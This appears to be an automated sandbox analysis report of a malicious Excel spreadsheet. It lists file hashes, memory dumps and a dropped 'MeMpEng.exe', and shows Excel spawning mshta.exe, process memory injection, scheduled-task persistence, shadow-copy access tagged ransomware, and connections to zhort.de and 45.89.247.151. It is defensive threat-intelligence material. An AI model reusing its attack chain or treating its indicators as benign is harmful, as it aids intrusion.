SHA1 23ad6ef2f427404d64bbe16b0ee95ec8eb6599fb
SHA256 c5da80199072c6617a65bbae884d04fcaea47b43b5055321eb7f022eecea49a0
SHA512 99fb6479f4eb7b83edc78002353b45b7af2ee57b9dd665386f11da6aa84bac0de0083d8405178e7be9709b38973253534b23b85cc47d9cee892a693626f61fdf

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

memory/1536-64-0x0000000001230000-0x00000000012CC000-memory.dmp

memory/1536-65-0x0000000000600000-0x0000000000618000-memory.dmp

memory/3040-66-0x000000007208D000-0x0000000072098000-memory.dmp

memory/1536-67-0x0000000000E10000-0x0000000000E86000-memory.dmp

memory/2572-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2572-73-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2572-70-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2572-68-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2572-76-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1392-77-0x0000000005010000-0x00000000050F0000-memory.dmp

memory/1220-78-0x0000000000030000-0x0000000000124000-memory.dmp

memory/1220-79-0x0000000000180000-0x00000000001AF000-memory.dmp

memory/1392-82-0x00000000075C0000-0x00000000076A0000-memory.dmp

memory/3040-93-0x000000007208D000-0x0000000072098000-memory.dmp

memory/3040-90-0x000000005FFF0000-0x0000000060000000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 01:44

Reported

2024-08-29 01:47

Platform

win10v2004-20240802-en

Max time kernel

143s

Max time network

125s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\29082024_0144_28082024_Nuevo orden agosto.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 564 wrote to memory of 2644 (x2) | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\29082024_0144_28082024_Nuevo orden agosto.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 38.66.99.88.in-addr.arpa udp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 92.123.143.219:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 151.247.89.45.in-addr.arpa udp
US 8.8.8.8:53 219.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/564-1-0x00007FFC7AF8D000-0x00007FFC7AF8E000-memory.dmp

memory/564-0-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-3-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-2-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-4-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-8-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-7-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-6-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-11-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-14-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-13-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-15-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-18-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-17-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-16-0x00007FFC38900000-0x00007FFC38910000-memory.dmp

memory/564-12-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-10-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-9-0x00007FFC38900000-0x00007FFC38910000-memory.dmp

memory/564-5-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/2644-36-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/2644-40-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-43-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/564-44-0x00007FFC7AF8D000-0x00007FFC7AF8E000-memory.dmp

memory/564-45-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/2644-49-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp

memory/2644-50-0x00007FF7121B0000-0x00007FF7121B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 eb8ef0f7820b8209b5ac29ed9e849437
SHA1 4d435b72cc7e9dac30d6932c58f74969ade683c6
SHA256 f77700518a75d92cff849487ceb56e2280479d09b391bdfc3b47e75c4dee168a
SHA512 7be49ee1fd904682de4263b722a05210947805e0ce48a04fa16f5829ac347b6688e3004294dc727566ece06dc10db753fddddb523f3fd08ca036c1af80332b3f

memory/564-82-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-83-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-85-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-84-0x00007FFC3AF70000-0x00007FFC3AF80000-memory.dmp

memory/564-86-0x00007FFC7AEF0000-0x00007FFC7B0E5000-memory.dmp